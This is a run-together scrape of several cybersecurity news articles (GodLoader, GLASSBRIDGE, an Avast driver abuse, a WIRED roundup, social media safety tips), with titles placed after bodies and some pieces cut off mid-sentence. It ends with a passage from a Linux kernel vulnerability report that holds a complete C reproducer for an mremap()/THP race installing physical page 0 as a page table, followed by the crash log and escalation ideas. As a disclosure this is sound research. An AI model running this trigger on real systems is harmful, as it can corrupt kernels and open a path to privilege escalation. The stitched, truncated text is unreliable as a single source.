Over a dozen malicious Android apps identified on the Google Play Store that have been collectively downloaded over 8 million times contain malware known as SpyLoan, according to new findings from McAfee Labs.
"These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions, which

8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

Check Point Research has discovered cybercriminals exploiting the popular Godot Game Engine to deliver malicious software. Discover the techniques used by attackers and how to protect yourself from these threats.

****SUMMARY****

*   **Cybercriminals are exploiting the Godot game engine to deliver malware called GodLoader, targeting multiple platforms like Windows, macOS, and Linux.**

*   **GodLoader hides malicious code in game files, bypassing antivirus detection and compromising over 17,000 devices since June 2024.**

*   **The malware uses sandbox evasion, Microsoft Defender exclusions, and GitHub-hosted repositories to distribute attacks.**

*   **GodLoader’s payloads include RedLine Stealer and cryptocurrency miners, affecting 1.2 million Godot game users.**

*   **The Godot team advises downloading software from trusted sources and avoiding cracked files to stay safe.**

Check Point Research (CPR) has published its latest research on a novel multi-platform technique employed by cybercriminals to exploit the popular open-source game engine, Godot to deliver a newly discovered malicious payload dubbed GodLoader after bypassing traditional security measures.

The concerning aspect is GodLoader’s cross-platform functionality, making it effective on macOS, Windows, Linux, iOS, and Android. Although designed to target Windows, it can be used on Linux and macOS with minimal adjustments.  The malware is, reportedly, distributed via the Stargazers Ghost Network on GitHub, using over 200 repositories and 225 accounts between September and October 2024. 

“The threat actor behind this malware has been utilizing it since June 29, 2024, infecting over 17,000 machines,” and an attack can put 1.2 million users of Godot-developed games at risk, researchers noted in the blog post.

According to CPR’s research, cybercriminals exploit the flexibility of Godot’s scripting language, GDScript and embed malicious code within game assets, executing it when the game is launched. This is a stealthy approach, which enables attackers to bypass antivirus detection and compromise systems without raising alarms.

Further probing revealed that it uses sandbox and virtual machine detection, as well as Microsoft Defender exclusions, to avoid detection. The malware was hosted on Bitbucket.org and distributed across four attack waves, with initial payloads including RedLine Stealer and XMRig cryptocurrency miners.

For your information, Godot is a powerful tool for game development that allows developers to bundle game assets and scripts into .pck files, which contain the game’s resources, including images, sounds, and scripts. By injecting malicious GDScript code into these .pck files, attackers can trick the game engine into executing harmful commands.

As soon as the game loads the infected .pck file, the hidden script springs into action, downloading and deploying additional malware payloads onto the victim’s device.

The attack flow (Via CPR)

****Godot Engine’s Statement****

The Godot Engine development team, in response, has issued a statement, explaining that GodLoader doesn’t exploit a specific weakness in Godot itself because like any programming language (e.g. Python or Ruby) Godot also allows the creation of both good and bad programs. Though the malware exploits Godot’s scripting language (GDScript) to deliver its payload, this doesn’t make Godot inherently unsafe.

The team also noted that it isn’t a one-click exploit because the GodLoader malware tricks users into downloading/executing a seemingly harmless file (typically a .pck file disguised as a software crack). This file wouldn’t work on its own and the attackers also must provide the Godot runtime (.exe file) separately to make it successful. This means users have to take multiple steps to install the malware, making it less likely to be a one-click exploit.

Nonetheless, team Godot emphasizes the importance of good security habits and downloading from trusted sources like official websites, established distribution platforms, or trusted individuals. Windows and macOS users should check for signed executables and notarization by a trusted party and avoid using cracked software as it is a common target for malicious actors.

1.  **Gcore Thwarts 500M PPS DDoS Attack on Gaming Firm**
2.  **What is Blockchain Gaming and its Play-to-Earn Model?**
3.  **Exploring Data Privacy and Security in B2B Gaming Data**
4.  **Winos4.0 Malware Hits Windows via Fake Gaming Apps**
5.  **Gaming Firms, Community Members Hit by Dark Frost Botnet**

Godot Engine Exploited to Spread Malware on Windows, macOS, Linux

Protect your social media presence with tools like privacy checkups, monitoring services, and digital footprint scanners. Stay secure by avoiding oversharing, limiting third-party app permissions, and using strong passwords.

Social media is where we connect, share, and sometimes overshare. It’s a space to celebrate birthdays, post selfies, or argue about whether pineapple belongs on pizza (it does, by the way). But while we’re busy scrolling and double-tapping, it’s easy to forget that social media can also be a minefield for privacy and security risks.

With **so many apps** and services available, it can be tough to know which ones are worth your time. Here’s a breakdown of some of the most effective tools to enhance your social media safety, including apps and services tailored to specific needs.

****Twitter Viewer Apps****

Twitter (now X) viewer apps are third-party tools that help you track your activity, analyze engagement, and monitor mentions. If you’re looking to keep an eye on Twitter activity—whether it’s for your account, parental monitoring, or just to make sure everything’s on the up and up—some tools can help.

Twitter viewer apps can track down social media profiles connected to a person. This is super helpful if you’re trying to figure out if a profile is fake or just want to do a little online sleuthing. Ademilade Shodipe-Dosunmu from Techopedia says the best **Twitter viewer apps** in 2024 should be compatible with both iOS and Android devices, prioritize security, and be user-friendly. 

****Privacy Checkup Tools****

Most major platforms have built-in privacy checkup tools that make it easy to review and update your privacy settings.

*   Facebook Privacy Checkup: This tool walks you through settings for posts, profile details, app permissions, and more.

*   Google Privacy Checkup: Perfect for reviewing privacy settings for YouTube, Google Photos, and connected apps.

*   Instagram Privacy Settings: Found under Settings > Privacy, this section lets you control who sees your content, tags you, or sends direct messages.

Regularly revisiting these tools ensures your account stays secure, especially when platforms roll out new features or privacy policies.

If you’re serious about tracking your online presence, social media monitoring tools are invaluable. These tools scan platforms for mentions of your name, brand, or specific keywords, helping you **spot fake accounts**, leaks, or negative content.

*   Mention and Brand24: Great for keeping tabs on mentions of your name or brand.

*   Hootsuite and Sprout Social: These tools combine monitoring with post-scheduling, making them ideal for managing your accounts professionally.

*   Google Alerts: Set up alerts for your name or other identifiers to stay informed about where you’re being mentioned online.

****Digital Footprint Scanners****

Your digital footprint includes everything about you that’s publicly accessible online. From old social media accounts to forgotten forum posts, these breadcrumbs can reveal more than you’d like. Digital footprint scanners help identify and clean up these traces.

*   Mine: This tool shows which companies and platforms have your data and helps you request its removal.

*   BrandYourself: Ideal for individuals looking to improve their online reputation, this tool scans for public mentions of your name and offers suggestions to optimize your footprint.

*   DeleteMe: Helps remove your personal information from data brokers and people-search websites.

****Lock Down Your Privacy Settings****

Privacy settings are your first line of defence against unwanted snoopers. Most social media platforms let you control who sees your posts, what information is visible on your profile, and who can tag you. But let’s be honest—how many of us have checked these settings?

On Instagram, switch to a private account if you want to approve followers before they can see your posts. You can also limit who can message you or tag you in photos. On Facebook, head to the “Privacy Checkup” tool. It walks you through everything, from post visibility to who can find you using your email or phone number.

On Twitter, make your account private if you don’t want strangers replying to your tweets. Only approved followers will see your posts. On TikTok, set your account to private in the settings, so only approved followers can watch your videos.

****Think Before You Post****

This one’s a classic but so important: **don’t overshare**. Posting about your exact location, showing off expensive purchases, or spilling too much personal info can make you a target for scammers, thieves, or stalkers.

Delay location tags. If you’re posting about your vacation, wait until you’re back home. No need to let everyone know your house is empty. Skip the personal details. Your birthdate, address, or phone number shouldn’t be public.

Scammers can use this info for **identity theft**. Be cautious with kids’ photos. If you’re sharing pictures of your kids, avoid posting school names, uniforms, or anything that reveals their location. If you wouldn’t want it shouted from a rooftop, think twice about sharing it online.

****Watch Out for Scams****

Social media is a playground for scammers. Fake giveaways, phishing links, or “urgent” messages from what looks like a trusted company—these are all common traps.

If something seems too good to be true, it probably is. “Win a free iPhone!” or “Click here for a $500 gift card” are almost always scams. Double-check links by hovering over them before clicking. If the URL looks suspicious or doesn’t match the supposed source, don’t click it. **Beware of fake accounts**. Scammers often create fake profiles that look like real people or companies. Verify their authenticity before engaging. When in doubt, ignore or report the suspicious activity. Better safe than sorry!

****Limit Third-Party Apps and Permissions****

Ever taken one of those fun “What’s your spirit animal?” quizzes or used an app to find your Instagram top nine? While they’re entertaining, they often ask for access to your account info—and not all of them are trustworthy. Take a few minutes to review which apps and services you’ve connected to your social media accounts.

On Facebook, for example, go to the “Apps and Websites” section in your settings and remove anything you don’t recognize or no longer use. Keep it clean and minimize potential vulnerabilities.

****Be Mindful of Your Friends List****

It’s tempting to accept every friend request or follow back everyone who follows you, but not everyone has good intentions. Do a little social media “spring cleaning” every now and then. Unfriend or unfollow accounts you don’t recognize. Avoid adding people you don’t know IRL. Watch out for accounts with no profile picture, minimal activity, or lots of generic comments—they’re likely bots or fake profiles.

****Monitor Your Accounts Regularly****

Even with all these precautions, it’s important to keep an eye on your accounts for any suspicious activity. Check your login history (most platforms show recent logins) and look out for things like messages you didn’t send, posts or comments you didn’t make, and changes to your profile info. If something seems off, change your password immediately and report the issue to the platform.

****Know How to Report and Block****

Don’t hesitate to use the report and block features on social media. If someone’s harassing you, sending spam, or acting shady, block them. You can also report problematic accounts or content. Whether it’s hate speech, **fake news**, or inappropriate behaviour, your report helps platforms identify and remove harmful users.

****Educate Yourself and Your Circle****

The more you know about social media safety, the better protected you’ll be—and the same goes for your friends and family. Share tips with your loved ones, especially if they’re not tech-savvy. Teaching someone how to set up 2FA or spot a phishing scam could save them from a lot of trouble.

1.  **Best SEO Experts to Follow on Twitter (X) in 2025**
2.  **4 Benefits of Having a Social Media Marketing Strategy**
3.  **Snapchat Safety for Parents: How to Safeguard Your Child**
4.  **Your Guide To Navigating Mastodon, an Alternative to Twitter**
5.  **Half of Online Child Grooming Cases Now** **Happen** **on Snapchat**
6.  **How businesses should deal with negative feedback on social media**

Tips and Tools for Social Media Safety

Google reveals GLASSBRIDGE: A network of thousands of fake news sites pushing pro-China narratives globally. These sites, run by PR firms, spread disinformation and lack transparency.

****Summary****

*   **Google has uncovered a network of over 1,000 fake news websites spreading pro-China narratives.**

*   **The sites are operated by four PR firms acting on behalf of an unknown client.**

*   **These firms create websites that mimic legitimate news outlets and publish a mix of repurposed and pro-China content.**

*   **Google has blocked the sites from appearing on its news platforms due to policy violations.**

*   **The operation highlights the use of PR firms to spread disinformation and obscure the source of the content.**

Google’s Threat Intelligence Group (TAG), in collaboration with its **cybersecurity firm Mandiant**, has discovered a large-scale network of fake news websites operated by four different public relations (PR) firms spreading propaganda aligned with the interests of the Chinese government.

Dubbed GLASSBRIDGE, this network of PR firms has been creating and distributing inauthentic content globally to shape public opinion on key geopolitical issues. Since 2022, Google has banned and deindexed over 1,000 websites linked to GLASSBRIDGE from appearing in Google News and Google Discover for violating policies against deceptive practices and lack of editorial transparency.

These sites pose as independent media outlets but push narratives that align with Beijing’s political agenda, including topics like Taiwan, the South China Sea, and COVID-19. It is worth noting that this news emerged just weeks after **reports revealed** North Korean hackers using fake news to distribute malware.

“These campaigns show how private PR firms are being used to conduct coordinated influence campaigns,” Google said in a **blog post**. “By using these firms, the actors behind the information operations gain deniability, obscuring their role in spreading inauthentic content.”

The campaigns rely on newswire services to syndicate their content, with two PR firms directly operating these services. The fake news network targets audiences in over 30 countries, including the United States, Australia, Germany, Japan, and Brazil, as well as Chinese-speaking diasporas worldwide.

The four firms within the GLASSBRIDGE network are:

****1. Shanghai Haixun Technology****

Shanghai Haixun Technology is the most prolific PR firm in the network, with more than 600 domains linked to its operations already removed by Google. These sites target both English- and Chinese-speaking audiences, as well as countries across Asia, Europe, and the Americas.

Haixun’s websites are often filled with low-quality, repetitive content that mixes irrelevant filler articles with pro-China stories. The firm has also been caught using freelance platforms such as Fiverr to hire social media accounts to amplify its messaging.

In July 2023, Haixun’s influence campaigns were spotted infiltrating legitimate news outlets through subdomains provided by its newswire services, Times Newswire and World Newswire, allowing it to piggyback on the credibility of established media brands.

****2. Times Newswire and Shenzhen Haimai Yunxiang Media****

Google researchers identified Times Newswire and its operator, Shenzhen Haimai Yunxiang Media, as key players in distributing pro-China propaganda. These entities were tied to the PAPERWALL campaign, a network of over 100 fake websites **reported** by Citizen Lab earlier this year.

These fraud sites, which spanned more than 30 countries, published a combination of copied local news, conspiracy theories, and smear campaigns targeting individuals critical of Beijing. Many of these articles were short, appearing briefly on the sites before being removed to avoid detection.

****3. DURINBRIDGE****

DURINBRIDGE, another PR and marketing firm in the network, operates over 200 fake news sites. While most of its content consists of press releases and generic news, a portion is dedicated to spreading pro-China narratives, including articles linked to **DRAGONBRIDGE**, a long-standing influence operation tracked by Google.

These sites have also been used to promote politically motivated smear campaigns, such as targeting Taiwanese presidential candidates in the lead-up to elections.

****4. Shenzhen Bowen Media****

Shenzhen Bowen Media controls a network of more than 100 imitation news sites designed to cater to specific countries and cities. Articles are published in local languages, including French, German, Japanese, and Thai, to appear more credible to regional audiences.

The content often blends legitimate-looking local news with pro-Beijing narratives sourced from its newswire service, World Newswire, which is also used by Haixun.

Campaign flow and 2 fake news sites in German and Portuguese language targeting Brazilian readers (Screenshot: Google)

**The Bigger Picture**

This operation is part of a growing trend where nation-states outsource influence campaigns to private PR firms, allowing deniability. By using fake news sites instead of traditional social media disinformation, these campaigns can target audiences more effectively, tailoring content to local languages and issues.

The operation also refreshes the memory of The EU DisinfoLab, a Brussels-based NGO specializing in disinformation research, which **exposed** a massive pro-Indian influence operation known as “Indian Chronicles.” This extensive campaign, active for over 15 years, aimed to discredit Pakistan and influence international institutions, including the United Nations and the European Parliament.

Google’s action to block these websites from its news platforms shows disinformation campaigns are a reality. The exposure of the GLASSBRIDGE network. For readers, the lesson is to critically evaluate the sources of news and verify information across multiple outlets.

1.  **Malicious Abrax666 AI Chatbot Exposed as Potential Scam**
2.  **Hackers used fake job websites to scam jobless US veterans**
3.  **SEC Twitter Hacked, Spreads Fake News About Bitcoin ETFs**
4.  **Android XHelper App Exposed as Money Laundering Network**
5.  **Fake News Site Hit Android and Windows Users with Malware**

GLASSBRIDGE: Google Blocks Thousands of Pro-China Fake News Sites

Google has introduced a new feature called Restore Credentials to help users restore their account access to third-party apps securely after migrating to a new Android device.
Part of Android's Credential Manager API, the feature aims to reduce the hassle of re-entering the login credentials for every app during the handset replacement.
"With Restore Credentials, apps can seamlessly onboard

Google's New Restore Credentials Tool Simplifies App Login After Android Migration

Malware exploits legitimate Avast anti-rootkit driver to disable security software. Trellix researchers uncover the attack and provide mitigation steps.

****Summary:****

*   **Malware exploits a legitimate Avast Anti-Rootkit driver to gain kernel-level access**.

*   **Driver is used to terminate critical security processes and seize control of the system**.

*   **BYOVD (Bring Your Own Vulnerable Driver) protection mechanisms can prevent driver-based attacks**.

*   **Expert rules can be deployed to identify and block vulnerable drivers.**

Cybersecurity researchers at Trellix have identified a malicious campaign that exploits a legitimate Avast Anti-Rootkit driver, aswArPot.sys, to disable security software and take control of infected systems.

****How the Attack Works:****

The malware, dubbed “kill-floor.exe,” begins by dropping the aswArPot.sys driver into an apparently harmless Windows directory, disguising it as “ntfs.bin.” It then registers the driver as a service, granting the malware kernel-level access – the highest level of system privilege allowing it to terminate critical security processes and take control of the system.

The malware contains a hardcoded list of 142 security applications it targets for termination. The malware continuously monitors active processes and compares them against this list. When a match is found, the malware uses the Avast Anti-Rootkit driver to terminate the security process.

Simply put: The Avast driver, meant to remove malicious rootkits, unintentionally disables legitimate security software. Malware takes advantage of this trusted driver to avoid detection and work quietly within the system.

****Technical Look****

Trellix’s **technical analysis** of the Avast driver revealed the specific function, “FUN\_14001dc80,” responsible for terminating the security processes. This function utilizes standard Windows kernel functions (KeAttachProcess and ZwTerminateProcess) to carry out the termination, further masking the malicious activity as normal system operations.

****Protecting Yourself****

To prevent such driver-based attacks, Trellix recommends the use of BYOVD (Bring Your Own Vulnerable Driver) protection mechanisms. These mechanisms can identify and block specific vulnerable drivers based on their unique signatures or hashes.

Once these rules are integrated into your antivirus solution, organizations can prevent malware from exploiting legitimate drivers, elevate privileges, or disable security measures. Trellix has also provided a specific BYOVD expert rule to detect and block the malicious use of the aswArPot.sys driver.

1.  After Avast, the NordVPN server gets hacked
2.  Fake Antivirus Sites Spread Malware Disguised as Avast
3.  SpyNote Android Spyware Poses as Legit Crypto Wallets
4.  Avast hacked after attackers gained domain admin privileges
5.  Chinese APT Flax Typhoon uses legit tools for cyber espionage

Malware Exploits Trusted Avast Anti-Rootkit Driver to Disable Security Software

Plus: The worst telecom hack in US history rolls on, iPhones are harder to break into, and more of the week’s top security news.

A joint investigation by WIRED, Bayerischer Rundfunk (BR), and Netzpolitik.org uncovered that US companies legally collecting digital ad data are enabling adversaries to cheaply track American military and intelligence personnel. A collaborative analysis of billions of location coordinates from a US-based data broker revealed detailed tracking of thousands of devices from sensitive US sites in Germany, including NSA facilities and bases reportedly housing US nuclear weapons.

Elsewhere, social media giant Meta has disclosed for the first time its efforts to combat the forced-labor compounds driving the surge in pig butchering scams on its platforms. The company revealed that it has been quietly collaborating with global law enforcement, tech industry partners, and external experts for over two years to dismantle the crime syndicates behind these operations in Southeast Asia and the UAE. This year alone, Meta reports it has taken down more than 2 million accounts linked to scam compounds in Myanmar, Laos, Cambodia, the Philippines, and the UAE.

At the Cyberwarcon security conference on Friday, the cybersecurity firm SpyCloud shared findings about publicly accessible black market services offering low-cost access to sensitive information on Chinese citizens, including phone numbers, banking details, hotel and flight records, and even real-time location data. According to the firm’s researchers, these services seem to obtain their data through insiders within Chinese surveillance agencies and government contractors, who sell their access. Also at the conference, cybersecurity firm Volexity uncovered that a Russian hacking group has reportedly developed a novel Wi-Fi-hacking technique that involves taking control of a nearby laptop and using it as a bridge to infiltrate a targeted Wi-Fi network. Dubbed a “nearest neighbor attack,” the method was uncovered during a 2022 investigation by the firm into a network breach of an unnamed Washington, DC. client. And finally, researchers explored how the US is calling out foreign influence campaigns faster than they ever have—but there’s plenty of room for improvement.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

**“King of Toxic Masculinity” Gets Hacked**

Hacktivists have breached an online “educational platform” founded by the misogynistic right-wing influencer Andrew Tate reportedly revealing the email addresses of hundreds of thousands of users as well as the contents of the platforms’ private chat servers. Data from the hack, first reported by the Daily Dot, has now been published by the transparency nonprofit Distributed Denial of Secrets.

Andrew Tate, the so-called “king of toxic masculinity,” is currently under house arrest in Romania and faces two separate criminal charges, including allegations of forming an organized criminal group and trafficking women across Romania, the UK, and the US.

The compromised platform, a subscription-based service known as The Real World (formerly called Hustler's University), describes itself as a “global community” focused on “personal growth.” According to its website, members receive expert training, mentorship, and access to a wide range of educational courses for around $50 per month.

According to the Daily Dot, hacktivists announced their breach of the platform on Thursday by disrupting the course's main chatroom with a barrage of uploaded emojis while Tate was livestreaming an episode of his show _Emergency Meeting_ on Rumble. The emojis included a transgender pride flag, a feminist fist, an AI-generated image of Tate wrapped in a rainbow flag.

Data from the breach, verified by WIRED, includes more than 700,000 usernames and reportedly includes messages from 221 public and 395 private chat servers. An analysis by the Daily Dot reveals a mix of content within the chat logs, ranging from motivational quotes and personal progress updates to grievances about the “LGBTQ agenda.” WIRED is continuing to analyze the leaked material.

**The “Worst Telecom Hack in US History” Is Still Ongoing**

Chinese government hackers have infiltrated over a dozen US telecommunications companies in what a senior senator is calling the worst telecom breach in American history—and they’re still inside the networks. The hacking group, Salt Typhoon, has been able to eavesdrop on audio calls in real time and obtain millions of records of call and text metadata from targeted individuals, according to a Washington Post interview with Senator Mark Warner of Virginia, chairman of the Senate Intelligence Committee.

Fewer than 150 victims have been identified and notified by the FBI so far—most of them in the DC region—including president-elect Donald Trump, his vice president-elect, JD Vance, as well as people working for Vice President Kamala Harris and state department officials.

Warner said, however, that the effort was not directly election-related, as the hackers got into some telecom systems more than a year ago.

**Leaked Documents Show GrayKey Struggles to Access Modern iPhones**

Leaked documents obtained by 404 Media reveal that GrayKey, a phone-hacking tool used by law enforcement to extract data from devices in their possession, can at the moment only partially access information from modern iPhones running iOS 18.0 and 18.0.1.

While the precise details of exactly how Graykey operates are unknown, the tool reportedly brute-forces iPhone or Android passcodes to unlock them—essentially hacking the phone—allowing law enforcement to then access and extract encrypted device data. While the specific types of data accessible during a “partial” extraction are unclear, it likely includes unencrypted files and metadata, such as file sizes and folder structures.

The document provides context to an ongoing cat-and-mouse dynamic between forensic technology companies and mobile device manufacturers. With each new software update, tools like GrayKey are temporarily thwarted, prompting developers to quickly adapt their technology to catch up. At the moment it appears that they have not. This leak follows another report from 404 Media about a feature in iOS 18 called “inactivity reboot,” which forces devices to restart after four days of inactivity, adding another layer of difficulty for law enforcement attempting to access data on seized devices.

**Europe Probes Undersea Cable Sabotage**

European authorities are investigating suspected sabotage to two undersea fiber-optic cables: one linking Finland and Germany, and the other connecting Sweden and Lithuania. Russia—widely suspected as the likely perpetrator—denies involvement, dismissing the allegations as “ridiculous.”

The incident began on Sunday when two telecommunications companies detected traffic disruptions likely caused by physical damage to undersea cables. One of the affected cables, known as C-Lion—a vital 730-mile link between Finland and Central Europe—runs alongside other critical infrastructure, including gas pipelines and power lines.

By Wednesday, the Danish navy had reportedly intercepted a Chinese cargo ship in connection with the disruptions. The vessel, which had most recently docked in Russia before the incident, was near the damaged area at the time. It is now under investigation, with its crew being questioned about their possible involvement.

Andrew Tate’s ‘Educational Platform’ Was Hacked

A security-relevant race between mremap() and THP code has been discovered. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.

    SummaryI found a security-relevant race between mremap() and THP code. Reaching the buggy code typically requires the ability to create unprivileged namespaces. The bug leads to installing physical address 0 as a page table, which is likely exploitable in several ways: For example, triggering the bug in multiple processes can probably lead to unintended page table sharing, which probably can lead to stale TLB entries pointing to freed pages.I also found two other (untested) theoretical races, but those arguably might not even count as bugs, and I'm pretty sure they're not security bugs. I am including my analysis of the closely related non-issues 2 and 3 as context in case you're curious, but I think they're stuff we can deal with on the public list later (or maybe even just leave as-is). Feel free to ignore that part of this report.I will send a suggested patch for the security bug, but I think it's unclear if my patch is actually the right way to fix it.This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-12-31.For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlSecurity bug: move_normal_pmd vs MADVISE_COLLAPSEDescriptionIn mremap(), move_page_tables() looks at the type of the PMD entry and the specified address range to figure out by which method the next chunk of page table entries should be moved. At that point, the mmap_lock is held in write mode, but no rmap locks are held. For PMD entries that point to page tables and are fully covered by the source address range, move_pgt_entry(NORMAL_PMD, ...) is called, which first takes rmap locks, then does move_normal_pmd().move_normal_pmd() takes the necessary page table locks at source and destination, then moves an entire page table from the source to the destination:        /* Clear the pmd */        pmd = *old_pmd;        pmd_clear(old_pmd);        VM_BUG_ON(!pmd_none(*new_pmd));        pmd_populate(mm, new_pmd, pmd_pgtable(pmd));        flush_tlb_range(vma, old_addr, old_addr + PMD_SIZE);The problem is: The rmap locks, which protect against concurrent page table removal by retract_page_tables() in the THP code, are only taken after we have inspected the PMD entry to decide how to move it. So we can race as follows (with two processes that have mappings of the same tmpfs file that is stored on a tmpfs mount with huge=advise):process A                      process B=========                      =========mremap  mremap_to    move_vma      move_page_tables        get_old_pmd        alloc_new_pmd                      *** PREEMPT ***                               madvise(MADV_COLLAPSE)                                 do_madvise                                   madvise_walk_vmas                                     madvise_vma_behavior                                       madvise_collapse                                         hpage_collapse_scan_file                                           collapse_file                                             retract_page_tables                                               i_mmap_lock_read(mapping)                                               pmdp_collapse_flush                                               i_mmap_unlock_read(mapping)        move_pgt_entry(NORMAL_PMD, ...)          take_rmap_locks          move_normal_pmd          drop_rmap_locksIn this case, while move_normal_pmd() expects to see a PMD entry pointing to a page table, the PMD entry has actually been cleared. So this line:pmd_populate(mm, new_pmd, pmd_pgtable(pmd));runs pmd_pgtable() on a cleared PMD entry. On typical implementations (including the X86 one), this simply masks off some bits of pmd and assumes that the remainder is a physical address - so pmd_pgtable(0) returns a pointer to the page for physical address 0. Then, pmd_populate() constructs a PMD entry that points to this physical address as a page table.So this ends up installing physical address 0 as a page table.Fixing itI guess there are two ways we could fix this:    Hold the rmap locks much more broadly in move_page_tables(). In particular, take them before inspecting the source pmd, and if we do a PMD-level move, keep them held throughout the entire move.    Add a bunch of extra recheck/retry logic.I think the first option is nicer in terms of code complexity. Moving the lock up requires a small bit of refactoring though, and the broader locking could conceivably degrade the performance of concurrent rmap access.I will send a suggested patch for the first option in a minute (and I have tested that with that patch, my reproducer no longer triggers); but we might want to do some more bikeshedding of whether this is the right way to patch it, and if yes, whether the patch is doing too little lock-dropping for performance or adds too much complexity with the lock-dropping...ReproducerI made a testcase that triggers this issue after a while and causes a splat when the kernel later tries to unmap this page table at physical address 0:#define _GNU_SOURCE#include <err.h>#include <sched.h>#include <stdio.h>#include <string.h>#include <fcntl.h>#include <signal.h>#include <stdlib.h>#include <unistd.h>#include <sys/syscall.h>#include <sys/stat.h>#include <sys/prctl.h>#include <sys/mount.h>#include <sys/mman.h>#include <sys/wait.h>#include <sys/ioctl.h>static void pin_to(int cpu) {  cpu_set_t cset;  CPU_ZERO(&cset);  CPU_SET(cpu, &cset);  if (sched_setaffinity(0, sizeof(cpu_set_t), &cset))    err(1, "set affinity");}#ifndef MADV_COLLAPSE#define MADV_COLLAPSE 25#endif#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})static void write_file(char *name, char *buf) {  int fd = SYSCHK(open(name, O_WRONLY));  if (write(fd, buf, strlen(buf)) != strlen(buf))    err(1, "write %s", name);  close(fd);}static void write_map(char *name, int outer_id) {  char buf[100];  sprintf(buf, "0 %d 1", outer_id);  write_file(name, buf);}int main(void) {  // set up new mount ns for tmpfs with THP  int outer_uid = getuid();  int outer_gid = getgid();  SYSCHK(unshare(CLONE_NEWNS|CLONE_NEWUSER));  SYSCHK(mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL));  write_file("/proc/self/setgroups", "deny");  write_map("/proc/self/uid_map", outer_uid);  write_map("/proc/self/gid_map", outer_gid);  // make tmpfs with THP  SYSCHK(mount("none", "/tmp", "tmpfs", MS_NOSUID|MS_NODEV, "huge=advise"));  pin_to(0);  while (1) {    int fd = SYSCHK(open("/tmp/a", O_RDWR|O_CREAT, 0600));    void *ptr = SYSCHK(mmap((void*)0x200000UL, 0x200000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, 0));    SYSCHK(ftruncate(fd, 0x1000));    *((volatile char *)ptr) = 'a';    SYSCHK(ftruncate(fd, 0x200000));    SYSCHK(madvise(ptr, 0x200000, MADV_HUGEPAGE));    close(fd);    SYSCHK(unlink("/tmp/a"));    int child = SYSCHK(fork());    if (child == 0) {      for (int i=0; i<512; i++)        ((volatile char *)ptr)[0x1000*i] = 'a';      struct sched_param param = { .sched_priority = 0 };      SYSCHK(sched_setscheduler(0, SCHED_IDLE, &param));      /* race (outer side, will be preempted) */      SYSCHK(mremap((void*)0x200000, 0x200000, 0x200000, MREMAP_MAYMOVE|MREMAP_FIXED, (void*)0x40000000));      return 0;    }    for (int i=0; i<512; i++)      ((volatile char *)ptr)[0x1000*i] = 'a';    usleep(10);    /* race (inner side, will preempt after timer and voluntary resched) */    int madv_res = madvise(ptr, 0x200000, MADV_COLLAPSE);    if (madv_res == -1)      fprintf(stderr, "_");    int wstatus;    SYSCHK(waitpid(child, &wstatus, 0));    SYSCHK(munmap(ptr, 0x200000));    fprintf(stderr, ".");  }}Usage:user@vm:~/collapse-vs-mremap$ gcc -o collapse-vs-mremap-2-noassist collapse-vs-mremap-2-noassist.cuser@vm:~/collapse-vs-mremap$ ./collapse-vs-mremap-2-noassist.................................................................................................................................Result on Linux 6.11 in a QEMU VM, where a bunch of non-zero data is left over in the first 0x1000 bytes of physical memory (note the pmd:00000067):[  120.427189] BUG: Bad page map in process collapse-vs-mre  pte:f000ff53f000ff53 pmd:00000067[  120.428763] addr:0000000040000000 vm_flags:200000fb anon_vma:0000000000000000 mapping:ffff888007dd70f8 index:0[  120.430526] file:a fault:shmem_fault mmap:shmem_mmap read_folio:0x0[  120.431706] CPU: 0 UID: 1000 PID: 1219 Comm: collapse-vs-mre Tainted: G        W          6.11.0 #493[  120.433591] Tainted: [W]=WARN[  120.434201] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014[  120.435849] Call Trace:[  120.436375]  <TASK>[  120.436843]  dump_stack_lvl+0x53/0x70[  120.437570]  print_bad_pte+0x4e6/0x8e0[...][  120.447625]  vm_normal_page+0x1c8/0x260[...][  120.450162]  unmap_page_range+0x914/0x3d10[...][  120.456954]  unmap_vmas+0x1cc/0x390[...][  120.461123]  exit_mmap+0x160/0x6c0[...][  120.465181]  mmput+0xa0/0x3a0[  120.465793]  do_exit+0x7cd/0x27f0[...][  120.472198]  do_group_exit+0xac/0x230[  120.472916]  __x64_sys_exit_group+0x3e/0x50[  120.473722]  x64_sys_call+0x17f3/0x1800[  120.474469]  do_syscall_64+0x4b/0x110[  120.475189]  entry_SYSCALL_64_after_hwframe+0x76/0x7e[...][  120.489560]  </TASK>On other machines where physical page 0 contains only zeroes, the error is different and the kernel complains about the mm's pagetable bytes counter being -4096 on process exit.ImpactReaching this bug requires that you can create shmem/file THP mappings - anonymous THP uses different code that doesn't zap stuff under rmap locks. File THP is gated on an experimental config flag (CONFIG_READ_ONLY_THP_FOR_FS), so on normal distro kernels you need shmem THP to hit this bug. (Some Android kernels set CONFIG_READ_ONLY_THP_FOR_FS=y, but those kernels are older than 6.6, so they're not affected.)As far as I know, getting shmem THP normally requires that you can mount your own tmpfs with the right mount flags, so on normal Linux systems you usually need the ability to create your own user+mount namespace (like my reproducer does).If you trigger this bug in two different processes, or in two different locations in the same process, you should get physical page 0 mapped in two different places. Assuming you know that a certain part of the page contains zeroes, you should be able to get page table entries installed through one of the mappings, and then access those page table entries through the other mapping of the same page table.At that point, I think several bad things can happen that could lead to privilege escalation, though I haven't tested that:    When a PTE is zapped through the page table's first mapping, TLB flushes will only be done for the first mapping, but there can be TLB entries created through the second mapping. So you could probably end up with stale TLB entries pointing to freed pages.    If VMA 1 and VMA 2 share a page table, and you install an anonymous page through VMA 1, and then use mremap() on VMA 2 to move that PTE to another location, and 